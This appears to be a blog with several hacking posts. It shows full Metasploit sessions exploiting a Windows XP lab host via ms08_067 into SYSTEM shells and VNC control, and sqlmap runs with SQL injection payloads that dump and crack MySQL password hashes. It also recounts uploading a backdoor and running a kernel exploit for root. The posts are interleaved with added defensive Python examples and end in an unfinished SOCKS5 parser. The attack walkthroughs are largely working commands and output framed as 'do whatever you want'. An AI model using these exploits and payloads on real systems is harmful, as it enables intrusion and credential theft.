Manusia Tak Sempurna

msf > db_status
[*] postgresql connected to msf3
msf > hosts
Hosts
=====
address  mac  name  os_name  os_flavor  os_sp  purpose  info  comments
-------  ---  ----  -------  ---------  -----  -------  ----  --------

msf > db_nmap 192.168.56.101
[*] Nmap: Starting Nmap 5.51SVN ( http://nmap.org ) at 2011-09-30 07:49 WIT
[*] Nmap: Nmap scan report for 192.168.56.101
[*] Nmap: Host is up (0.0011s latency).
[*] Nmap: Not shown: 996 closed ports
[*] Nmap: PORT     STATE SERVICE
[*] Nmap: 135/tcp  open  msrpc
[*] Nmap: 139/tcp  open  netbios-ssn
[*] Nmap: 445/tcp  open  microsoft-ds
[*] Nmap: 3389/tcp open  ms-term-serv
[*] Nmap: MAC Address: 08:00:27:2B:15:80 (Cadmus Computer Systems)
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 1.40 seconds
msf > hosts

Hosts
=====

address         mac                name  os_name  os_flavor  os_sp  purpose  info  comments
-------         ---                ----  -------  ---------  -----  -------  ----  --------
192.168.56.101  08:00:27:2B:15:80                                                


msf > db_autopwn -p -t -e
[*] Analysis completed in 8 seconds (0 vulns / 0 refs)
[*]
[*] =========================================================================
[*]                             Matching Exploit Modules
[*] =========================================================================
[*]   192.168.56.101:135  exploit/windows/dcerpc/ms03_026_dcom  (port match)
[*]   192.168.56.101:139  exploit/freebsd/samba/trans2open  (port match)
[*]   192.168.56.101:139  exploit/linux/samba/chain_reply  (port match)
[*]   192.168.56.101:139  exploit/linux/samba/lsa_transnames_heap  (port match)
[*]   192.168.56.101:139  exploit/linux/samba/trans2open  (port match)
[*]   192.168.56.101:139  exploit/multi/samba/nttrans  (port match)
[*]   192.168.56.101:139  exploit/multi/samba/usermap_script  (port match)
[*]   192.168.56.101:139  exploit/netware/smb/lsass_cifs  (port match)
[*]   192.168.56.101:139  exploit/osx/samba/lsa_transnames_heap  (port match)
[*]   192.168.56.101:139  exploit/solaris/samba/trans2open  (port match)
[*]   192.168.56.101:139  exploit/windows/brightstor/ca_arcserve_342  (port match)
[*]   192.168.56.101:139  exploit/windows/brightstor/etrust_itm_alert  (port match)
[*]   192.168.56.101:139  exploit/windows/smb/ms03_049_netapi  (port match)
[*]   192.168.56.101:139  exploit/windows/smb/ms04_011_lsass  (port match)
[*]   192.168.56.101:139  exploit/windows/smb/ms04_031_netdde  (port match)
----------------------------------cut here------------------------------------------
[*] (1/51 [0 sessions]): Launching exploit/windows/dcerpc/ms03_026_dcom against 192.168.56.101:135...
[*] (2/51 [0 sessions]): Launching exploit/freebsd/samba/trans2open against 192.168.56.101:139...
[*] (3/51 [0 sessions]): Launching exploit/linux/samba/chain_reply against 192.168.56.101:139...
[*] (4/51 [0 sessions]): Launching exploit/linux/samba/lsa_transnames_heap against 192.168.56.101:139...
[*] (5/51 [0 sessions]): Launching exploit/linux/samba/trans2open against 192.168.56.101:139...
[*] (6/51 [0 sessions]): Launching exploit/multi/samba/nttrans against 192.168.56.101:139...
[*] (7/51 [0 sessions]): Launching exploit/multi/samba/usermap_script against 192.168.56.101:139...
[*] (8/51 [0 sessions]): Launching exploit/netware/smb/lsass_cifs against 192.168.56.101:139...
[*] (9/51 [0 sessions]): Launching exploit/osx/samba/lsa_transnames_heap against 192.168.56.101:139...
[*] (10/51 [0 sessions]): Launching exploit/solaris/samba/trans2open against 192.168.56.101:139...
[*] (11/51 [0 sessions]): Launching exploit/windows/brightstor/ca_arcserve_342 against 192.168.56.101:139...
[*] (12/51 [0 sessions]): Launching exploit/windows/brightstor/etrust_itm_alert against 192.168.56.101:139...
[*] (13/51 [0 sessions]): Launching exploit/windows/smb/ms03_049_netapi against 192.168.56.101:139...
[*] (14/51 [0 sessions]): Launching exploit/windows/smb/ms04_011_lsass against 192.168.56.101:139...
[*] (15/51 [0 sessions]): Launching exploit/windows/smb/ms04_031_netdde against 192.168.56.101:139...
[*] (16/51 [0 sessions]): Launching exploit/windows/smb/ms05_039_pnp against 192.168.56.101:139...
[*] (17/51 [0 sessions]): Launching exploit/windows/smb/ms06_040_netapi against 192.168.56.101:139...
[*] (18/51 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwapi against 192.168.56.101:139...
[*] (19/51 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwwks against 192.168.56.101:139...
[*] (20/51 [0 sessions]): Launching exploit/windows/smb/ms06_070_wkssvc against 192.168.56.101:139...
[*] (21/51 [0 sessions]): Launching exploit/windows/smb/ms07_029_msdns_zonename against 192.168.56.101:139...
[*] (22/51 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 192.168.56.101:139...
[*] (23/51 [0 sessions]): Launching exploit/windows/smb/ms10_061_spoolss against 192.168.56.101:139...
[*] (24/51 [0 sessions]): Launching exploit/windows/smb/netidentity_xtierrpcpipe against 192.168.56.101:139...
[*] (25/51 [0 sessions]): Launching exploit/windows/smb/psexec against 192.168.56.101:139...
[*] (26/51 [0 sessions]): Launching exploit/windows/smb/timbuktu_plughntcommand_bof against 192.168.56.101:139...
----------------------------------cut here------------------------------------------
[*] (49/51 [0 sessions]): Launching exploit/windows/smb/netidentity_xtierrpcpipe against 192.168.56.101:445...
[*] (50/51 [0 sessions]): Launching exploit/windows/smb/psexec against 192.168.56.101:445...
[*] (51/51 [0 sessions]): Launching exploit/windows/smb/timbuktu_plughntcommand_bof against 192.168.56.101:445...
[*] (51/51 [0 sessions]): Waiting on 38 launched modules to finish execution...
[*] (51/51 [0 sessions]): Waiting on 25 launched modules to finish execution...
[*] Meterpreter session 1 opened (192.168.56.1:49973 -> 192.168.56.101:20907) at 2011-09-30 07:51:35 +0700
[*] (51/51 [1 sessions]): Waiting on 11 launched modules to finish execution...
[*] Meterpreter session 2 opened (192.168.56.1:58149 -> 192.168.56.101:33496) at 2011-09-30 07:51:37 +0700
[*] (51/51 [2 sessions]): Waiting on 7 launched modules to finish execution...
[*] (51/51 [2 sessions]): Waiting on 6 launched modules to finish execution...

Active sessions
===============

  Id  Type                   Information                     Connection                                  Via
  --  ----                   -----------                     ----------                                  ---
  1   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ SADAHIKE  192.168.56.1:49973 -> 192.168.56.101:20907  exploit/windows/smb/ms08_067_netapi
  2   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ SADAHIKE  192.168.56.1:58149 -> 192.168.56.101:33496  exploit/windows/smb/ms08_067_netapi

[*] =========================================================================
msf > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 1952 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

do whatever you want!!!


Or try this:
msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/vncinject/reverse_tcp
PAYLOAD => windows/vncinject/reverse_tcp
msf  exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/vncinject/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   AUTOVNC   true             yes       Automatically launch VNC viewer if present
   EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port
   VNCHOST   127.0.0.1        yes       The local host to use for the VNC proxy
   VNCPORT   5900             yes       The local port to use for the VNC proxy


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf  exploit(ms08_067_netapi) > set RHOST 192.168.56.101
RHOST => 192.168.56.101
msf  exploit(ms08_067_netapi) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf  exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.56.1:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (445440 bytes) to 192.168.56.101
[*] Starting local TCP relay on 127.0.0.1:5900...
[*] Local TCP relay started.
[*] Launched vncviewer.
[*] Session 3 created in the background.

VNC Viewer Free Edition 4.1.1 for X - built Apr  9 2010 15:52:37
Copyright (C) 2002-2005 RealVNC Ltd.
See http://www.realvnc.com for information on VNC.
msf  exploit(ms08_067_netapi) >
Fri Sep 30 08:14:30 2011
 CConn:       connected to host 127.0.0.1 port 5900

Fri Sep 30 08:14:31 2011
 CConnection: Server supports RFB protocol version 3.8
 CConnection: Using RFB protocol version 3.8
 TXImage:     Using default colormap and visual, TrueColor, depth 24.
 CConn:       Using pixel format depth 6 (8bpp) rgb222
 CConn:       Using ZRLE encoding
 CConn:       Throughput 3781 kbit/s - changing to hextile encoding
 CConn:       Throughput 3781 kbit/s - changing to full colour
 CConn:       Using pixel format depth 24 (32bpp) little-endian rgb888
 CConn:       Using hextile encoding

Fri Sep 30 08:14:32 2011
 CConn:       Throughput 20000 kbit/s - changing to raw encoding
 CConn:       Using raw encoding




Now you can control the Windows machine on your own :p



Manusia Tak Sempurna

I scan with sqlmap, and this is the syntax:

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.56.101/webku3/login.php?" --data "username=27&password=27" --dbs --level=5 --risk=3
sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 22:36:50

[22:36:51] [INFO] using '/pentest/database/sqlmap/output/192.168.56.101/session' as session file
[22:36:51] [INFO] resuming injection data from session file
[22:36:51] [INFO] resuming injection data from session file
[22:36:51] [INFO] resuming back-end DBMS 'mysql 5' from session file
[22:36:51] [INFO] testing connection to the target url
[22:36:51] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: username
    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: username=27' AND 4232=BENCHMARK(5000000,MD5(CHAR(110,86,112,67))) AND 'UxaS'='UxaS&password=27

Place: POST
Parameter: password
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: username=27&password=-6012' OR NOT (7812=7812) AND 'FaHO'='FaHO

    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: username=27&password=27' AND 3903=BENCHMARK(5000000,MD5(CHAR(120,68,103,113))) AND 'QbLo'='QbLo
---
[22:36:51] [INFO] manual usage of POST payloads requires url encoding
there were multiple injection points, please select the one to use for following injections:
[0] place: POST, parameter: username, type: Single quoted string (default)
[1] place: POST, parameter: password, type: Single quoted string
[q] Quit
> 0
[22:36:58] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5
[22:36:58] [INFO] fetching database names
[22:36:58] [INFO] fetching number of databases
[22:36:58] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': 9
[22:36:58] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': information_schema
[22:36:58] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': Joomla
[22:36:58] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': dvwa
[22:36:58] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': mysql
[22:36:58] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': phpmyadmin
[22:36:58] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': test
[22:36:58] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': webku
[22:36:58] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': webku3
[22:36:58] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': wordpress
available databases [9]:
[*] dvwa
[*] information_schema
[*] Joomla
[*] mysql
[*] phpmyadmin
[*] test
[*] webku
[*] webku3
[*] wordpress

[22:36:58] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/192.168.56.101'

[*] shutting down at: 22:36:58
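Both POST parameters are injectable because login.php splices the submitted username and password straight into its SQL string. The following is an added example (not code from the post or from the target application) that models that query against an in-memory SQLite table (the post's backend is MySQL; SQLite is used only so it runs offline) and shows why sqlmap's boolean-based probe changes the result for the concatenated query and not for a parameterized one:

```python
import sqlite3

# Constructed stand-in for the login table behind webku3/login.php (assumption: a plain
# users(username, password) table; the real schema is not shown in the post).
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", "s3cret"), ("bob", "hunter2")])
    return conn

def vulnerable_login(conn, username: str, password: str) -> int:
    """Builds the WHERE clause by string concatenation. A single quote in the input
    closes the literal and the rest of the input becomes SQL: this is the defect
    sqlmap reported on both POST parameters."""
    sql = ("SELECT COUNT(*) FROM users WHERE username='%s' AND password='%s'"
           % (username, password))
    return conn.execute(sql).fetchone()[0]

def safe_login(conn, username: str, password: str) -> int:
    """Same query with bound parameters: the driver sends the values separately from
    the SQL text, so quotes and keywords inside them are just characters."""
    sql = "SELECT COUNT(*) FROM users WHERE username=? AND password=?"
    return conn.execute(sql, (username, password)).fetchone()[0]

# Probe pair in the style of sqlmap's "OR boolean-based blind" test. FALSE_PROBE is the
# password payload from the output above; TRUE_PROBE is its counterpart without the NOT,
# so the injected condition evaluates to true.
FALSE_PROBE = "-6012' OR NOT (7812=7812) AND 'FaHO'='FaHO"
TRUE_PROBE = "-6012' OR (7812=7812) AND 'FaHO'='FaHO"

def probe_difference(login, conn) -> tuple:
    """Rows matched for (false probe, true probe). A concatenating query answers
    (0, all rows), which is the page difference sqlmap detects; a parameterized
    query answers (0, 0) because no user has that literal password."""
    return (login(conn, "27", FALSE_PROBE), login(conn, "27", TRUE_PROBE))

if __name__ == "__main__":
    db = make_db()
    print("concatenated:", probe_difference(vulnerable_login, db))   # (0, 2)
    print("parameterized:", probe_difference(safe_login, db))        # (0, 0)
```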

And then I try to search for a username and password in the database with sqlmap:

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.56.101/webku3/login.php?" --data "username=27&password=27" -D phpmyadmin -T user --password --level=5 --risk=3

    sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 22:37:51

[22:37:52] [INFO] using '/pentest/database/sqlmap/output/192.168.56.101/session' as session file
[22:37:52] [INFO] resuming injection data from session file
[22:37:52] [INFO] resuming injection data from session file
[22:37:52] [INFO] resuming back-end DBMS 'mysql 5' from session file
[22:37:52] [INFO] testing connection to the target url
[22:37:52] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: username
    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: username=27' AND 4232=BENCHMARK(5000000,MD5(CHAR(110,86,112,67))) AND 'UxaS'='UxaS&password=27

Place: POST
Parameter: password
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: username=27&password=-6012' OR NOT (7812=7812) AND 'FaHO'='FaHO

    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: username=27&password=27' AND 3903=BENCHMARK(5000000,MD5(CHAR(120,68,103,113))) AND 'QbLo'='QbLo
---

[22:37:52] [INFO] manual usage of POST payloads requires url encoding
there were multiple injection points, please select the one to use for following injections:
[0] place: POST, parameter: username, type: Single quoted string (default)
[1] place: POST, parameter: password, type: Single quoted string
[q] Quit
> 0
[22:37:54] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5
[22:37:54] [INFO] fetching database users password hashes
[22:37:54] [INFO] fetching database users
[22:37:54] [INFO] fetching number of database users
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': 5
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': 'root'@'localhost'
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': 'root'@'pakdhe-laptop'
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': 'root'@'127.0.0.1'
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': 'debian-sys-maint'@'localhost'
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': 'phpmyadmin'@'localhost'
[22:37:54] [INFO] fetching number of password hashes for user 'root'
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': 2
[22:37:54] [INFO] fetching password hashes for user 'root'
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': *7B4BDBFF8519BFDF2FEBEAF893534A8163E9F170
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
[22:37:54] [INFO] fetching number of password hashes for user 'debian-sys-maint'
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': 1
[22:37:54] [INFO] fetching password hashes for user 'debian-sys-maint'
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': *896747F40953077D8AB58F8A3002427D8DC256FE
[22:37:54] [INFO] fetching number of password hashes for user 'phpmyadmin'
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': 1
[22:37:54] [INFO] fetching password hashes for user 'phpmyadmin'
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
do you want to use dictionary attack on retrieved password hashes? [Y/n/q] y
[22:37:57] [INFO] using hash method: 'mysql_passwd'
what's the dictionary's location? [/pentest/database/sqlmap/txt/wordlist.txt]
[22:37:58] [INFO] loading dictionary from: '/pentest/database/sqlmap/txt/wordlist.txt'
do you want to use common password suffixes? (slow!) [y/N] y
[22:38:02] [INFO] starting dictionary attack (mysql_passwd)
[22:38:04] [INFO] found: 'root' for user: 'root'
[22:38:05] [INFO] found: 'root' for user: 'phpmyadmin'
database management system users password hashes:
[*] debian-sys-maint [1]:
    password hash: *896747F40953077D8AB58F8A3002427D8DC256FE
[*] phpmyadmin [1]:
    password hash: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
    clear-text password: root
[*] root [2]:
    password hash: *7B4BDBFF8519BFDF2FEBEAF893534A8163E9F170
    password hash: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
    clear-text password: root

[22:39:55] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/192.168.56.101'

[*] shutting down at: 22:39:55
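The dictionary attack above works because MySQL's PASSWORD() hash (sqlmap's 'mysql_passwd') is an unsalted double SHA-1: any hash can be compared against a wordlist offline, and identical hashes (root and phpmyadmin above) mean identical passwords. The following added example (not part of the post) reimplements that hash and audits the hashes from the output for weak and shared passwords, the check a DBA should run over their own mysql.user table; the wordlist is constructed.

```python
import hashlib
from collections import defaultdict

def mysql_native_password(password: str) -> str:
    """MySQL 4.1+ PASSWORD(): '*' + uppercase hex of SHA1(SHA1(password)), where the
    inner digest is fed in as raw bytes. No salt, so equal passwords give equal hashes."""
    inner = hashlib.sha1(password.encode("utf-8")).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()

# Hashes exactly as sqlmap printed them above; root has two rows (two host entries),
# numbered here because the output does not say which host each belongs to.
ACCOUNTS = {
    "root#1": "*7B4BDBFF8519BFDF2FEBEAF893534A8163E9F170",
    "root#2": "*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B",
    "debian-sys-maint": "*896747F40953077D8AB58F8A3002427D8DC256FE",
    "phpmyadmin": "*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B",
}

# Constructed mini wordlist standing in for sqlmap's txt/wordlist.txt.
WEAK_PASSWORDS = ["password", "root", "toor", "admin", "123456"]

def audit_weak(accounts: dict, wordlist) -> dict:
    """Map each account to the wordlist entry that reproduces its hash, or None.
    Hashing the wordlist once and looking hashes up is what makes this fast."""
    lookup = {mysql_native_password(w): w for w in wordlist}
    return {acct: lookup.get(h.upper()) for acct, h in accounts.items()}

def audit_shared(accounts: dict) -> list:
    """Groups of accounts that share one hash, i.e. the same password."""
    by_hash = defaultdict(list)
    for acct, h in accounts.items():
        by_hash[h.upper()].append(acct)
    return sorted(sorted(g) for g in by_hash.values() if len(g) > 1)

if __name__ == "__main__":
    for acct, pw in audit_weak(ACCOUNTS, WEAK_PASSWORDS).items():
        print(acct, "->", "WEAK: %r" % pw if pw else "not in wordlist")
    print("accounts sharing a password:", audit_shared(ACCOUNTS))
```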

Then I try to connect from sqlmap to the MySQL shell:

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.56.101/webku3/login.php?" --data "username=27&password=27" -D phpmyadmin -T user --sql-shell --level=5 --risk=3

    sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 08:27:56

[08:27:56] [INFO] using '/pentest/database/sqlmap/output/192.168.56.101/session' as session file
[08:27:56] [INFO] resuming injection data from session file
[08:27:56] [INFO] resuming injection data from session file
[08:27:56] [INFO] resuming back-end DBMS 'mysql 5' from session file
[08:27:56] [INFO] testing connection to the target url
[08:27:56] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: username
    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: username=27' AND 4232=BENCHMARK(5000000,MD5(CHAR(110,86,112,67))) AND 'UxaS'='UxaS&password=27

Place: POST
Parameter: password
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: username=27&password=-6012' OR NOT (7812=7812) AND 'FaHO'='FaHO

    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: username=27&password=27' AND 3903=BENCHMARK(5000000,MD5(CHAR(120,68,103,113))) AND 'QbLo'='QbLo
---

[08:27:56] [INFO] manual usage of POST payloads requires url encoding
there were multiple injection points, please select the one to use for following injections:
[0] place: POST, parameter: username, type: Single quoted string (default)
[1] place: POST, parameter: password, type: Single quoted string
[q] Quit
> 1
[08:27:59] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5
[08:27:59] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell> show databases;
do you want to retrieve the SQL statement output? [Y/n/a] y
[08:28:18] [INFO] fetching SQL SELECT statement query output: 'show databases;'
[08:28:18] [WARNING] running in a single-thread mode. please consider usage of --threads option to declare higher number of threads
[08:28:18] [INFO] retrieved:
sql-shell>

But it seems it can't connect.

to be continued................

Manusia Tak Sempurna
To exploit a server I use a scanner to find out which application is running on the system. After I scan, I get the result, but the application is the latest version, so how can I break the system through the application?

Then I just explore the web application menu by menu. I find a vulnerability in the file upload on the site. I test uploading a picture to the site and it succeeds; I try to upload a file with the extension .txt and it succeeds too. Maybe the web developer does not sanitize which files can be uploaded.

Then I just upload a backdoor that I have prepared; I upload the backdoor to the site and it is uploaded successfully. Now I search for where the file has been uploaded and I find it. After running the backdoor, I try to exploit the kernel of the system. I search for a kernel exploit and I find it, and I upload the kernel exploit through the backdoor on the site.

After that I just run the exploit against the kernel to gain full access as root, and it works. Now I have full access to the system.
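The upload flaw described above, a site that stores whatever file the browser sends, is fixed on the server. The following is an added example (not the target site's code) of the checks an upload handler should perform before storing a file: an extension allowlist, no inner extension a web server might hand to an interpreter, a magic-byte check that the content really is the image type it claims, and refusal of ELF/PE executables and PHP tags (the kind of ban Suhosin's upload options automate). The sample file contents are constructed.

```python
import os

# Allowed extensions and the leading bytes a genuine file of that type starts with.
IMAGE_MAGIC = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".gif": b"GIF8",
}
# Inner extensions that some Apache setups hand to an interpreter even when a
# harmless extension follows (e.g. shell.php.png).
EXECUTABLE_EXTS = {".php", ".php3", ".php4", ".php5", ".phtml", ".pl", ".cgi", ".sh"}
EXECUTABLE_MAGIC = (b"\x7fELF", b"MZ")            # Linux ELF, Windows PE/DOS stub
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<script")    # PHP tags and inline script
MAX_BYTES = 2 * 1024 * 1024

def check_upload(filename: str, content: bytes) -> tuple:
    """Return (accepted, reason). Reject anything that is not clearly a plain image."""
    if not content:
        return False, "empty file"
    if len(content) > MAX_BYTES:
        return False, "file too large"
    name = os.path.basename(filename)
    if name != filename or name.startswith(".") or "\x00" in name:
        return False, "path separators, hidden names and NUL bytes are not allowed"
    parts = name.lower().split(".")
    if len(parts) < 2:
        return False, "no extension"
    ext = "." + parts[-1]
    if ext not in IMAGE_MAGIC:
        return False, "extension %s is not allowed" % ext
    if {"." + p for p in parts[1:-1]} & EXECUTABLE_EXTS:
        return False, "executable inner extension"
    if content.startswith(EXECUTABLE_MAGIC):
        return False, "executable content"
    if not content.startswith(IMAGE_MAGIC[ext]):
        return False, "content does not match %s" % ext
    if any(marker in content.lower() for marker in SCRIPT_MARKERS):
        return False, "script marker inside file"
    return True, "ok"

# Constructed samples: a minimal PNG header, a harmless PHP file, an ELF header stub.
PNG_STUB = b"\x89PNG\r\n\x1a\n" + b"\x00" * 32
PHP_STUB = b"<?php echo 'constructed sample'; ?>"
ELF_STUB = b"\x7fELF\x02\x01\x01" + b"\x00" * 16
```

Storing accepted files under a server-generated name, outside the document root or in a directory with script execution disabled, is still required; these checks only keep obvious non-images out.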
Manusia Tak Sempurna

SOCKS is a network protocol designed to allow clients to communicate with Internet servers through firewalls. SOCKS is typically implemented on proxy servers. It is supported as a proxy configuration option in popular Web browsers and instant messaging programs. SOCKS can also be found in some VPN implementations.
Multiple versions of the SOCKS protocol exist including SOCKS v4 and SOCKS v5. SOCKS v4 uses TCP as a transport, while SOCKS v5 also supports UDP. The base SOCKS v5 specification is RFC 1928 with additional details captured in RFC 1929 and RFC 1961.
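As an added example (not from the post), here is the SOCKS v5 wire format the paragraph refers to, following RFC 1928: the client greeting with its offered authentication methods, the server's method selection, and the CONNECT/BIND/UDP ASSOCIATE request and its reply, as builders and parsers. A parser like this is what a proxy log analyser or an IDS rule author needs to tell an ordinary CONNECT from an unexpected UDP ASSOCIATE.

```python
import socket
import struct

SOCKS_VERSION = 0x05
CMD_CONNECT, CMD_BIND, CMD_UDP_ASSOCIATE = 0x01, 0x02, 0x03  # UDP ASSOCIATE exists only in v5
ATYP_IPV4, ATYP_DOMAIN, ATYP_IPV6 = 0x01, 0x03, 0x04
METHOD_NOAUTH, METHOD_USERPASS, METHOD_NONE_ACCEPTABLE = 0x00, 0x02, 0xFF

def build_greeting(methods) -> bytes:
    """Client greeting: VER | NMETHODS | METHODS (RFC 1928, section 3)."""
    return bytes([SOCKS_VERSION, len(methods)]) + bytes(methods)

def parse_greeting(data: bytes) -> list:
    """Methods the client offers; rejects non-v5 or wrongly sized greetings."""
    if len(data) < 2 or data[0] != SOCKS_VERSION or len(data) != 2 + data[1]:
        raise ValueError("malformed SOCKS5 greeting")
    return list(data[2:])

def build_method_selection(method: int) -> bytes:
    """Server answer to the greeting: VER | METHOD (0xFF = no acceptable method)."""
    return bytes([SOCKS_VERSION, method])

def _encode_addr(host: str) -> bytes:
    """ATYP + address: IPv4 literal, IPv6 literal, or length-prefixed domain name."""
    try:
        return bytes([ATYP_IPV4]) + socket.inet_aton(host)
    except OSError:
        pass
    try:
        return bytes([ATYP_IPV6]) + socket.inet_pton(socket.AF_INET6, host)
    except OSError:
        pass
    name = host.encode("idna")
    if not 0 < len(name) <= 255:
        raise ValueError("domain name length must be 1..255 bytes")
    return bytes([ATYP_DOMAIN, len(name)]) + name

def _decode_addr(data: bytes, offset: int) -> tuple:
    """Return (host, offset just past the address) for the ATYP at data[offset]."""
    atyp = data[offset]
    if atyp == ATYP_IPV4:
        return socket.inet_ntoa(data[offset + 1:offset + 5]), offset + 5
    if atyp == ATYP_IPV6:
        return socket.inet_ntop(socket.AF_INET6, data[offset + 1:offset + 17]), offset + 17
    if atyp == ATYP_DOMAIN:
        n = data[offset + 1]
        return data[offset + 2:offset + 2 + n].decode("idna"), offset + 2 + n
    raise ValueError("unknown ATYP 0x%02x" % atyp)

def build_request(cmd: int, host: str, port: int) -> bytes:
    """Client request: VER | CMD | RSV=0 | ATYP | DST.ADDR | DST.PORT (section 4)."""
    return bytes([SOCKS_VERSION, cmd, 0x00]) + _encode_addr(host) + struct.pack("!H", port)

def parse_request(data: bytes) -> tuple:
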